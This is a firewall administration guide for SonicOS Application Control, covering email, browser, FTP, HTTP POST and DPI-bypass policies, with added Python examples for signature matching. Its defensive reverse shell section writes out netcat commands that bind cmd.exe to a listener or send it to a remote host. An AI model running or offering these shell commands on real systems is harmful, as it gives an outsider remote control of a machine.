Application Control can be very effective for certain types of email control, especially when a blanket policy is desired. For example, you can prevent sending attachments of a given type, such as .exe, on a per-user basis, or for an entire domain. Because the file name extension is being matched in this case, changing the extension before sending the attachment will bypass filtering. Note that you can also prevent attachments in this way on your email server if you have one. If not, then Application Control provides the functionality.

You can create a match object that scans for file content matching strings such as “confidential,” “internal use only,” and “proprietary” to implement basic controls over the transfer of proprietary data.

You can also create a policy that prevents email to or from a specific domain or a specific user. You can use Application Control to limit email file size, but not to limit the number of attachments. Application Control can block files based on MIME type. It cannot inspect the contents of SSL or TLS encrypted traffic, nor can it block all encrypted files. To block encrypted email from a site that is using HTTPS, you can create a custom match object that matches the server certificate sent during the SSL handshake, before the session is encrypted, and then a custom policy that blocks that certificate. This works for SSL and for TLS 1.2 and earlier, where the certificate is transmitted in the clear; TLS 1.3 encrypts the server certificate, so the handshake no longer exposes it. See File Formats That Can Be Scanned for Keywords.

Application Control can scan email attachments that are text-based or are compressed to one level, but not encrypted. The following table lists file formats that Application Control can scan for keywords. Other formats should be tested before you use them in a policy.

File Formats That Can Be Scanned for Keywords

File Type                       Common Extension
C source code                   c
C++ source code                 cpp
Comma-separated values          csv
HQX archives                    hqx
HTML                            htm
Lotus 1-2-3                     wks
Microsoft Access                mdb
Microsoft Excel                 xls
Microsoft PowerPoint            ppt
Microsoft Visio                 vsd
Microsoft Visual Basic          vbp
Microsoft Word                  doc
Microsoft Works                 wps
Portable Document Format        pdf
Rich Text Format                rtf
SIT archives                    sit
Text files                      txt
WordPerfect                     wpd
XML                             xml
Tar archives ("tarballs")       tar
ZIP archives                    zip, gzip

Web Browser Control

You can also use Application Control to protect your Web servers from undesirable browsers. Application Control supplies match object types for Netscape, MSIE, Firefox, Safari, and Chrome. You can define a match object using one of these types, and reference it in a policy to block that browser.

You can also access browser version information by using an HTTP User Agent match object type. For example, older versions of various browsers can be susceptible to security problems. Using Application Control, you can create a policy that denies access by any problematic browser, such as Internet Explorer. You can also use negative matching to exclude all browsers except the one(s) you want. For example, you might want to allow Internet Explorer version 6 only, due to flaws in version 5, and because you haven’t tested version 7. To do this, you would use a network protocol analyzer such as Wireshark to determine the Web browser identifier for IEv6, which is MSIE 6.0. Then you could create a match object of type HTTP User Agent, with content MSIE 6.0 and enable negative matching.

You can use this match object in a policy to block browsers that are not MSIE 6.0. For information about using Wireshark to find a Web browser identifier, see Wireshark. For information about negative matching, see Negative Matching.

Another example of a use case for controlling Web browser access is a small e-commerce site that is selling discounted goods that are salvaged from an overseas source. If the terms of their agreement with the supplier is that they cannot sell to citizens of the source nation, they could configure Application Control to block access by the in-country versions of the major Web browsers.

Application Control supports a pre-defined selection of well-known browsers, and you can add others as custom match objects. Browser blocking is based on the HTTP User-Agent header reported by the browser. Your custom match object must contain content specific enough to identify the browser without creating false positives. You can use Wireshark or another network protocol analyzer to obtain a unique signature for the desired browser. Because the User-Agent header is supplied by the client, this controls well-behaved browsers only; a user or attacker who changes the header is not stopped by it.

HTTP Post Control

You can enhance the security of public facing read-only HTTP servers by disallowing the HTTP POST method.

To disallow HTTP POST:
1
Use Notepad or another text editor to create a new document called Post.htm that contains this HTML code:

<FORM action="http://www.yahoo.com/" method="post">
<p>Please enter your name: <input type="Text" name="FullName"></p>
<input type="submit" value="Submit"> <INPUT type="reset">
</FORM>

2
Save the file to your desktop or a convenient location.
3
Open the Wireshark network analyzer.
4
Start a capture. For information about using Wireshark, see Wireshark.
5
In a browser, open the Post.htm file you just created.
6
Type in your name.
7
Click Submit.
8
Stop the capture.
9
Using the Wireshark Edit > Find Packet function, search for the string POST.

Wireshark will jump to the first frame that contains the requested data. You should see something like this, which indicates that the HTTP POST method is transmitted immediately after the TCP header information and is comprised of the first four bytes (504f5354) of the TCP payload (HTTP application layer):

You can use that information to create a custom match object that detects the HTTP POST method.

To create a custom match object:
1
Navigate to Firewall > Match Objects.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object like this one:

* 
NOTE: In this particular match object you would use the Enable Settings feature to create an object that matches a specific part of the payload. The Offset field specifies which byte in the payload to begin matching and helps to minimize false positives by making the match more specific. The Depth field specifies at what byte to stop matching. The Min and Max fields allow you to specify a minimum and maximum payload size.
4
Navigate to Firewall > App Rules.
5
Click Add New Policy. The Edit App Control Policy dialog displays.
6
Create a policy like this one:

7
To test, use a browser to open the Post.htm document you created earlier.
8
Type in your name.
9
Click Submit. The connection should be dropped this time, and you should see an alert in the log similar to this one:

Forbidden File Type Control

You can use Application Control to prevent risky or forbidden file types (for example, exe, vbs, scr, dll, avi, mov) from being uploaded or downloaded.

To control forbidden file types:
1
Navigate to Firewall > Match Objects.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create an object like this one:

4
Navigate to Firewall > Action Objects.
5
Click Add New Action Object. The Add/Edit Action Object dialog displays.
6
Create an action like this one:

To see a preview of the message to be displayed, click Preview.

7
Click OK.
8
To create a policy that uses this object and action, navigate to Firewall > App Rules.
9
Click Add New Policy. The Edit App Control Policy dialog displays.
10
Create a policy like this one:

11
Click OK.
12
To test this policy, open a Web browser and try to download any of the file types specified in the match object (exe, vbs, scr). Below is a URL that you can try:

http://www.skype.com/en/download-skype/skype-for-computer/

You will see an alert similar to the one shown below.

ActiveX Control

One of the most useful capabilities of Application Control is the ability to distinguish between different types of ActiveX or Flash network traffic. This allows you to block games while permitting Windows updates. Prior to Application Control, you could configure SonicOS to block ActiveX with Security Services > Content Filter, but this blocked all ActiveX controls, including your software updates.

Application Control achieves this distinction by scanning for the value of classid in the HTML source. Each type of ActiveX has its own class ID, and the class ID can change for different versions of the same application. The classid must appear literally in HTML that the appliance can read: a page fetched over HTTPS, or one that assembles the object tag in script, is not matched.

Some ActiveX types and their classids are shown in ActiveX Types and Classids.

ActiveX Types and Classids

ActiveX Type                          Classid
Apple Quicktime                       02BF25D5-8C17-4B23-BC80-D3488ABDDC6B
Adobe Flash v6, v7                    D27CDB6E-AE6D-11cf-96B8-444553540000
Adobe Shockwave                       D27CDB6E-AE6D-11cf-96B8-444553540000
Microsoft Windows Media Player v6.4   22d6f312-b0f6-11d0-94ab-0080c74c7e95
Microsoft Windows Media Player v7-10  6BF52A52-394A-11d3-B153-00C04F79FAA6
Real Networks Real Player             CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
Sun Java Web Start                    5852F5ED-8BF4-11D4-A245-0080C6F74284

Example of ActiveX-Type Match Object shows an ActiveX-type match object that is using the Adobe Shockwave class ID. You can create a policy that uses this match object to block online games or other Adobe Shockwave-based content.

Example of ActiveX-Type Match Object

You can look up the class ID for these Active X controls on the Internet, or you can view the source in your browser to find it. For example, Example Source File for Shockwave or Flash shows a source file with the class ID for Adobe Shockwave or Flash.

Example Source File for Shockwave or Flash

FTP Control

Application Control provides control over the FTP control channel and FTP uploads and downloads with the FTP Command and File Content match object types. Using these, you can regulate FTP usage very effectively. The following use cases are described in this section:

Blocking Outbound Proprietary Files Over FTP

Blocking outbound files over FTP is best done through a policy based on keywords or patterns inside the files.

To block outbound file transfers of proprietary files over FTP.
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object of type File Content that matches on keywords in files:

4
Click OK.
5
Optionally, you can create a customized FTP notification action that sends a message to the client.
a
Navigate to Firewall > Action Objects.
b
Click Add New Action Object. The Add/Edit Action Object dialog displays.
c
Create the Action Object with the message to be displayed.

d
Click OK.
6
Navigate to Firewall > App Rules.
7
Click Add New Policy. The Edit App Control Policy dialog displays.
8
Create a policy that references this match object and action:

If you prefer to simply block the file transfer and reset the connection, you can select the Reset/Drop action when you create the policy.

9
Click OK.

Blocking Outbound UTF-8/UTF-16 Encoded Files

Native Unicode UTF-8 and UTF-16 support by Application Control allows encoded multi-byte characters, such as Chinese or Japanese characters, to be entered as match object content keywords using the alphanumeric input type. Application Control supports keyword matching of UTF-8 encoded content typically found in Web pages and email applications, and UTF-16 encoded content typically found in Windows OS/Microsoft Office based documents.

Blocking outbound file transfers of proprietary Unicode files over FTP is handled in the same way as blocking other confidential file transfers.

To create a policy that blocks outbound UTF-8/UTF-16 encoded files:
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object that matches on UTF-8 or UTF-16 encoded keywords in files.

For example, a match object type of File Content with a UTF-16 encoded Chinese keyword that translates as “confidential document.”

4
Click OK.
5
Navigate to Firewall > App Rules.
6
Click Add New Policy. The Edit App Control Policy dialog displays.
7
Create a policy that references the match object and uses the Reset/Drop action, so that transfer of a matching file is blocked and the connection is reset. Select Enable Logging so any attempt to transfer a file containing the UTF-16 encoded keyword is logged.

8
Click OK.

A log entry is generated after a connection Reset/Drop, including the Message stating that it is an Application Control Alert and displaying the Policy name and the Action Type of Reset/Drop.
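A keyword typed once into a match object has to be found as three different byte sequences, depending on how the file that carries it was encoded. The following Python is an added example, not part of the SonicOS guide and not SonicWALL code: it derives the UTF-8, UTF-16LE and UTF-16BE byte patterns for one keyword, prints them in the space-free hex form a Custom Object with Hexadecimal input would take, and scans constructed sample files to show which pattern fires for a Windows-style UTF-16 document versus a UTF-8 web page. The keyword "机密文件" (assumed here to be the guide's "confidential document") and the sample files are the author's assumptions.

```python
from typing import Dict, List

# Added example: one keyword, three byte patterns. Not SonicOS code.
ENCODINGS = ("utf-8", "utf-16-le", "utf-16-be")

def keyword_patterns(keyword: str) -> Dict[str, bytes]:
    """The byte sequences a content scanner must look for so that one keyword
    is caught in web/email text (UTF-8) and in Windows/Office text (UTF-16,
    either byte order)."""
    return {enc: keyword.encode(enc) for enc in ENCODINGS}

def keyword_hex(keyword: str) -> Dict[str, str]:
    """The same patterns as space-free hex, the form a Custom Object with
    Hexadecimal input representation takes if entered by hand."""
    return {enc: pat.hex() for enc, pat in keyword_patterns(keyword).items()}

def scan(data: bytes, keyword: str) -> List[str]:
    """Encodings in which `keyword` occurs in `data` (empty list = no hit)."""
    return [enc for enc, pat in keyword_patterns(keyword).items() if pat in data]

# Constructed sample files. The keyword is assumed to be the guide's
# "confidential document" in Simplified Chinese.
KEYWORD = "机密文件"
OFFICE_LIKE = b"\xff\xfe" + "Title\n机密文件 v2".encode("utf-16-le")  # BOM + UTF-16LE
WEB_LIKE = "<p>机密文件</p>".encode("utf-8")
BIG_ENDIAN = b"\xfe\xff" + "机密文件".encode("utf-16-be")
UNRELATED = "公开文件".encode("utf-8")                                   # "public document"

if __name__ == "__main__":
    for enc, hx in keyword_hex(KEYWORD).items():
        print(f"{enc:9} {hx}")
    samples = (("office", OFFICE_LIKE), ("web", WEB_LIKE),
               ("bigend", BIG_ENDIAN), ("other", UNRELATED))
    for label, blob in samples:
        print(f"{label:7} -> {scan(blob, KEYWORD)}")
```

The same applies to a plain ASCII keyword: "confidential" stored in a UTF-16LE document is "c\0o\0n\0..." on the wire and a single-byte search for it finds nothing. For ASCII keywords the two UTF-16 patterns also overlap by one byte (an ASCII character followed by the keyword in a little-endian file contains the big-endian pattern), so both should feed the same policy rather than separate actions.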

Blocking FTP Commands

You can use Application Control to ensure that your FTP server is read-only by blocking commands such as put, mput, rename_to, rename_from, rmdir, and mkdir.

The following procedure shows how to create a match object containing only the put command, but you could include all of the FTP commands in the same match object.

To block FTP commands:
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object that matches on the put command:

* 
TIP: Select the FTP command from the Command drop-down menu.
* 
TIP: The mput command is a client-side convenience that sends the same FTP STOR command as put for each file, so a match object that matches the put command also matches the mput command.
4
Click OK.
5
Optionally, you can create a customized FTP notification action that sends a message to the client.
a
Navigate to Firewall > Action Objects.
b
Click Add New Action Object. The Add/Edit Action Object dialog displays.
c
Create the Action Object with the message to be displayed.

d
Click OK.
6
Navigate to Firewall > App Rules.
7
Click Add New Policy. The Edit App Control Policy dialog displays.
8
Create a policy that references this match object and action. If you prefer to simply block the put command and reset the connection, you can select the Reset/Drop action when you create the policy.

9
Click OK.

Bandwidth Management

You can use application-layer bandwidth management to control the amount of network bandwidth that can be used to transfer certain file types. This allows you to discourage non-productive traffic and encourage productive traffic on your network.

For example, you can limit the bandwidth used to download MP3 files over FTP to no more than 400 kilobits per second (kbps). Whether one user or 100 users are downloading MP3 files, this policy limits their aggregate bandwidth to 400 kbps.

For information on configuring bandwidth management, see Bandwidth Management Overview.

Bypass DPI

You can use the Bypass DPI action to increase performance over the network if you know that the content being accessed is safe. For example, this might be the case if your company has a corporate video that you want to stream to company employees over HTTP by having them access a URL on a Web server. As you know that the content is safe, you can create an Application Control policy that applies the Bypass DPI action to every access of this video. This ensures the fastest streaming speeds and the best viewing quality for employees accessing the video. Because everything the match object covers is exempt from inspection, scope it to the exact URI of the video rather than a prefix that other content could later be served under, and remember that anything matched reaches clients unscanned.

To bypass DPI:
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Define a match object for the corporate video using a match object type of HTTP URI Content:

* 
TIP: The leading slash (/) of the URL should always be included for Exact Match and Prefix Match types for URI Content match objects. You do not need to include the host header, such as www.company.com, in the Content field.
4
Click OK.
5
Navigate to Firewall > App Rules.
6
Click Add New Policy. The Edit App Control Policy dialog displays.
7
Create a policy that uses the Corporate Video match object and also uses the Bypass DPI action:

8
Click OK.

Custom Signature

You can create a custom match object that matches any part of a packet if you want to control traffic that does not have a predefined object type in Application Control. This allows you to create a custom signature for any network protocol.

For instance, you can create a custom signature to match HTTP GET request packets. You might use this if you want to prevent Web browsing from your local area network.

To determine a unique identifier for a HTTP GET packet, you can use the Wireshark network protocol analyzer to view the packet header. For more information about using Wireshark, see Wireshark. In Wireshark, capture some packets that include the traffic you are interested in. In this case, you want to capture a HTTP GET request packet. You can use any web browser to generate the HTTP GET request.

To create a custom policy for a custom signature:
1
Start a Wireshark capture on the interface that carries your browser traffic.
2
In any web browser, open a Web page so that the browser sends an HTTP GET request.
3
Wireshark displays the HTTP GET request packet:

4
In the top pane of Wireshark, scroll down to find the HTTP GET packet.
5
Click on that line.

The packet is displayed in the two lower panes. For the selected packet, the center pane provides a human-readable decode of each protocol layer, and the raw packet bytes are displayed in hexadecimal in the lower pane.

6
In the center pane, expand the Hypertext Transfer Protocol section to see the packet payload.
7
Click on the identifier you want to reference in Application Control. In this case, the identifier is the GET command in the first three bytes. Click on this to highlight the corresponding bytes in the lower pane.
8
You can determine the offset and the depth of the highlighted bytes in the lower pane. Offset and depth are terms used by Application Control. Offset indicates which byte in the packet to start matching against, and depth indicates the last byte to match. Using an offset allows very specific matching and minimizes false positives.
* 
NOTE: When you calculate offset and depth, the first byte in the packet is counted as number one (not zero). Decimal numbers are used rather than hexadecimal to calculate offset and depth. Offset and depth associated with a custom match object are calculated starting from the packet payload (the beginning of the TCP or UDP payload). In this case, the offset is 1 and the depth is 3.
9
Navigate to Firewall > Match Object.
10
Click Add New Match Object. The Add/Edit Match Object dialog displays.
11
Create a custom match object that uses this information.

a
Enter a descriptive name for the object in the Object Name field.
b
Select Custom Object from the Match Object Type drop-down menu. Select Exact Match from the Match Type drop-down menu.
c
Select the Enable Settings check box. The settings fields become available.
d
In the Offset field, type 1 (the starting byte of the identifier).
e
In the Depth field, type 3 (the last byte of the identifier).
* 
TIP: You can leave the Payload Size set to the default value. The Payload Size constrains how much data the packet carries, but in this case only the first three bytes of the payload matter.
f
For Input Representation, select Hexadecimal.
g
In the Content field, type the bytes as shown by Wireshark: 474554. Do not use spaces in hexadecimal content.
12
Click OK.
13
Navigate to Firewall > App Rules.
14
Click Add New Policy. The Edit App Control Policy dialog displays.
15
Create a policy that uses the HTTP GET match object:

16
Enter a descriptive name for the policy in the Policy Name field.
17
Select HTTP Client for the policy type from the Policy Type drop-down menu.
18
From the Match Object drop-down menu, select the match object that you just defined, HTTP GET.
19
Select a custom action or a default action such as Reset/Drop.
20
For the Connection Side, select Client Side. You can also modify other settings. For more information about creating a policy, see Prerequisites to Configuring App Rules Policies.
21
Click OK.
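The offset, depth and payload-size settings used in the Custom Signature steps above, and in the HTTP Post Control example earlier, are easy to get wrong by one byte. The following Python is an added example, not SonicOS code and not a SonicWALL tool: it implements the semantics the NOTE in step 8 describes (1-based offset, depth as the last byte to examine, both counted from the start of the TCP payload, plus minimum and maximum payload size) as a small matcher and runs it over constructed HTTP payloads. One payload is a POST whose body contains the bytes "GET", which shows why the window, not just the content, decides the match. The class, its field names and the sample requests are the author's reading of the settings, not the appliance's internal representation.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# Added example: a Custom Object with "Enable Settings" on, modelled on the
# guide's description. Author's interpretation, not SonicOS internals.

@dataclass
class CustomObject:
    """offset = first payload byte to examine (1-based); depth = last byte to
    examine (1-based, None = to the end of the payload); content is hex
    with no spaces, as the guide requires."""
    name: str
    content_hex: str
    offset: int = 1
    depth: Optional[int] = None
    min_payload: int = 0
    max_payload: Optional[int] = None
    content: bytes = field(init=False)

    def __post_init__(self) -> None:
        if " " in self.content_hex:
            raise ValueError("hexadecimal content must not contain spaces")
        if self.offset < 1:
            raise ValueError("offset is 1-based; the first payload byte is 1")
        self.content = bytes.fromhex(self.content_hex)

    def matches(self, payload: bytes) -> bool:
        """True when the content lies entirely inside the offset..depth window
        of a payload whose size is within [min_payload, max_payload]."""
        n = len(payload)
        if n < self.min_payload:
            return False
        if self.max_payload is not None and n > self.max_payload:
            return False
        start = self.offset - 1                      # convert to 0-based slice
        end = n if self.depth is None else min(self.depth, n)
        return start < end and self.content in payload[start:end]

def matching_objects(objects: List[CustomObject], payload: bytes) -> List[str]:
    """Names of the objects that fire on one TCP payload."""
    return [o.name for o in objects if o.matches(payload)]

# The two objects the guide builds: GET = 47 45 54 in bytes 1-3,
# POST = 50 4f 53 54 in bytes 1-4.
HTTP_GET = CustomObject("HTTP GET", "474554", offset=1, depth=3)
HTTP_POST = CustomObject("HTTP POST", "504f5354", offset=1, depth=4)
# The same bytes with no window: fires anywhere in the payload.
GET_ANYWHERE = CustomObject("GET anywhere", "474554")
ALL = [HTTP_GET, HTTP_POST, GET_ANYWHERE]

# Constructed TCP payloads (client side of an HTTP connection).
GET_REQ = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
POST_REQ = (b"POST /login HTTP/1.1\r\nHost: www.example.com\r\n"
            b"Content-Length: 9\r\n\r\nname=GET!")

if __name__ == "__main__":
    for label, payload in (("GET request", GET_REQ), ("POST request", POST_REQ)):
        print(f"{label}: {matching_objects(ALL, payload)}")
```

The unwindowed object fires on the POST request because its body happens to contain "GET"; the windowed object does not. That is the false positive the Offset and Depth fields exist to prevent, and it is why the guide's HTTP GET object is built with offset 1 and depth 3 rather than with content alone.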

Reverse Shell Exploit Prevention

The reverse shell exploit is an attack that you can prevent by using Application Control's custom signature capability (see Custom Signature). A reverse shell could be used by an attacker who has gained access to your system by means of a zero-day exploit, that is, an exploit for a vulnerability that is not yet known to the vendor and for which security software has no signature.

In an early stage while still unknown, malicious payloads can pass through the first line of defense, which is the IPS and Gateway Anti-Virus (GAV) running at the Internet gateway and even the second line of defense represented by the host-based Anti-Virus software, allowing arbitrary code execution on the target system.

In many cases, the executed code contains the minimal amount of instructions needed for the attacker to remotely obtain a command prompt window (with the privileges of the exploited service or logged on user) and proceed with the penetration from there.

As a common means to circumvent NAT/firewall issues, which might prevent their ability to actively connect to an exploited system, attackers make the vulnerable system execute a reverse shell. In a reverse shell, the connection is initiated by the target host to the attacker address, using well-known TCP/UDP ports for better avoidance of strict outbound policies.

This use case is applicable to environments hosting Windows systems and will intercept unencrypted connections over all TCP/UDP ports.

* 
NOTE: Networks using unencrypted Telnet service must configure policies that exclude those servers’ IP addresses.

While this use case refers to the specific case of reverse shell payloads (outbound connections), it is more secure to configure the policy to be effective also for inbound connections. This protects against a case where the executed payload spawns a listening shell onto the vulnerable host and the attacker connects to that service across misconfigured firewalls.

The actual configuration requires the following:

Generating the network activity to be fingerprinted, using the netcat tool
Capturing the activity and exporting the payload to a text file, using the Wireshark tool
Creating a match object with a string that is specific and unique enough to avoid false positives
Defining a policy with the action to take when a payload containing the object is parsed (the default Reset/Drop is used here)

Generating the Network Activity

The netcat tool offers, among other features, the ability to bind a program’s input and output to an outbound or a listening connection. The following usage examples show how to set up a listening “Command Prompt Daemon” or how to connect to a remote endpoint and provide an interactive command prompt:

nc -l -p 23 -e cmd.exe

A Windows prompt will be available to hosts connecting to port 23 (the -l option stands for listen mode, as opposed to the default, implicit, connect mode; -e binds the named program to the connection and is only present in netcat builds compiled with that option).

nc -e cmd.exe 44.44.44.44 23

A Windows prompt will be available to host 44.44.44.44 if host 44.44.44.44 is listening on port 23 using the netcat command:

nc -l -p 23

Capturing and Exporting the Payload to a Text File, Using Wireshark

To capture the data, launch Wireshark and click Capture > Interfaces to open a capture dialog. Start a capture on the interface with the netcat traffic. As soon as the capture begins, run the netcat command and then stop the capture.

Data Flow shows the data flow through the network during such a connection (Vista Enterprise, June 2007):

Data Flow

The hexadecimal data can be exported to a text file, where the packet headers, spaces, and any unneeded or variable parts are trimmed off. The relevant portion here is the command prompt banner (Microsoft… reserved.); the match object below uses the part of it up to Corporation. You can use the Wireshark hexadecimal payload export capability for this. For information about Wireshark, see Wireshark.

Creating a Match Object

The following hexadecimal characters are entered as the object content of the match object representing the Vista command prompt banner (they decode to Microsoft Windows [Version 6.0.6000], a CR/LF pair, and Copyright (c) 2006 Microsoft Corporation.):

4D6963726F736F66742057696E646F7773205B56657273696F6E20362E302E363030305D0D0A436F70797269676874202863292032303036204D6963726F736F667420436F72706F726174696F6E2E

NOTE: The fingerprint export and the match object definition do not really need to use hexadecimal notation here, because the actual signature is ASCII text in this case. Hexadecimal is only required for binary signatures. Because the version number and copyright year are part of the object, it matches only this Vista build, which is why a separate object is needed per Windows version.

Similar entries are obtained in the same manner from Windows 2000 and Windows XP hosts and used to create other match objects, resulting in the three match objects (one per Windows version) shown below:

Other examples for Windows Server 2003 or any other Windows version may be easily obtained using the described method.

Linux/Unix administrators need to customize the default shell prompt (for example, the PS1 variable in bash) to take advantage of this signature-based defense, as the default prompt is typically not specific or unique enough to be used as described above.

Defining the Policy

After creating the match objects, you can define a policy that uses them. The image below shows the other policy settings. This example, as shown in Reverse Shell App Control Policy, is specific to reverse shells in both the Policy Name and the Direction setting (outbound sessions only). As mentioned, it can also be given a wider scope by changing the Direction setting to Both and using a more generic name.

Reverse Shell App Control Policy

A log entry with a Category of Network Access is generated after a connection Reset/Drop. The screenshot below shows the log entry, including the message stating that it is an Application Control Alert and displaying the policy name:
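The following Python script is an added example and is not part of the SonicOS guide or of the appliance's own code. It reproduces, offline, the steps of the Capturing and Exporting, Creating a Match Object, and Defining the Policy sections: it cuts the TCP payload out of a raw Ethernet/IPv4/TCP frame the way the Wireshark export does, trims it to the stable banner span and renders the hexadecimal match object content, and then emulates the policy decision for a reverse shell, a bind shell (caught only with Direction set to Both), and a Telnet session to an excluded server. The frames, IP addresses, and session contents are constructed test data; the Vista banner text is the one the guide fingerprints.

```python
# Added example, not from the SonicOS guide: Wireshark payload export,
# hexadecimal match object, and App Rules policy Direction check in Python.
# All frames, addresses and streams below are constructed test data.
import struct

# Banner cmd.exe prints on Windows Vista (the text fingerprinted in the guide).
VISTA_BANNER = (b"Microsoft Windows [Version 6.0.6000]\r\n"
                b"Copyright (c) 2006 Microsoft Corporation.  All rights reserved.\r\n\r\n"
                b"C:\\Windows\\system32>")

# Match object content: hex of the banner from "Microsoft" through "Corporation.".
GUIDE_HEX = ("4D6963726F736F66742057696E646F7773205B56657273696F6E20362E302E36303030"
             "5D0D0A436F70797269676874202863292032303036204D6963726F736F667420"
             "436F72706F726174696F6E2E")
SIGNATURES = [bytes.fromhex(GUIDE_HEX)]


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame around payload (constructed
    test data; checksums are left zero, which the parser below ignores)."""
    eth = b"\x00" * 12 + b"\x08\x00"                       # MACs + EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1,
                      5 << 4, 0x18, 65535, 0, 0)             # 20-byte header, PSH|ACK
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0, 0x4000, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp + payload


def tcp_payload(frame):
    """What the Wireshark export gives once the headers are cut: honour the
    IPv4 IHL and TCP data offset instead of assuming 20-byte headers."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:
        raise ValueError("not TCP")
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    doff = (tcp[12] >> 4) * 4
    return tcp[doff:]


def match_object_hex(payload, start=b"Microsoft", end=b"Corporation."):
    """Trim the payload to the stable banner span and render it as the
    hexadecimal string entered as match object content."""
    s = payload.index(start)
    e = payload.index(end, s) + len(end)
    return payload[s:e].hex().upper()


def policy_action(direction, client_to_server, server_to_client, signatures,
                  policy_direction="Outgoing", excluded_servers=(), server_ip=None):
    """Emulate the App Rules decision for one TCP session (simplified model).

    direction is "Outgoing" (session initiated from inside) or "Incoming".
    policy_direction "Outgoing" covers reverse shells only; "Both" also
    catches a bind shell reached from outside.  Servers in excluded_servers
    (legitimate Telnet hosts) are exempted, as the guide's note advises.
    Returns "Reset/Drop" or "Allow".
    """
    if server_ip in excluded_servers:
        return "Allow"
    if policy_direction != "Both" and direction != policy_direction:
        return "Allow"
    # Reassemble each side of the stream before matching, so a banner split
    # across two TCP segments is still found.
    for data in (b"".join(client_to_server), b"".join(server_to_client)):
        if any(sig in data for sig in signatures):
            return "Reset/Drop"
    return "Allow"


def demo():
    # Reverse shell: victim 10.0.0.5 connects out to 44.44.44.44:23 and the
    # banner flows victim -> attacker, split over two segments.
    frames = [build_frame("10.0.0.5", "44.44.44.44", 49152, 23, VISTA_BANNER[:20]),
              build_frame("10.0.0.5", "44.44.44.44", 49152, 23, VISTA_BANNER[20:])]
    reverse = policy_action("Outgoing", [tcp_payload(f) for f in frames], [], SIGNATURES)
    # Bind shell: the attacker connects in; only Direction=Both sees it.
    bind_default = policy_action("Incoming", [], [VISTA_BANNER], SIGNATURES)
    bind_both = policy_action("Incoming", [], [VISTA_BANNER], SIGNATURES,
                              policy_direction="Both")
    # Telnet to an excluded Windows server shows the same banner but is allowed.
    telnet = policy_action("Outgoing", [b"user\r\n"], [VISTA_BANNER], SIGNATURES,
                           excluded_servers={"10.0.0.9"}, server_ip="10.0.0.9")
    return reverse, bind_default, bind_both, telnet


if __name__ == "__main__":
    frame = build_frame("10.0.0.5", "44.44.44.44", 49152, 23, VISTA_BANNER)
    print(match_object_hex(tcp_payload(frame)))
    print(demo())
```

The reassembly step matters in practice: the appliance inspects the stream, but if you test a signature with a single-packet tool, a banner that straddles a segment boundary can fool a per-packet check. The exclusion list models the address exclusion the note about Telnet servers calls for; without it the Telnet session in the demo would be reset exactly like the reverse shell.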

As experience suggests, appropriate security measures include several layers of intelligence; no single approach can be considered a definitive defense against hostile code.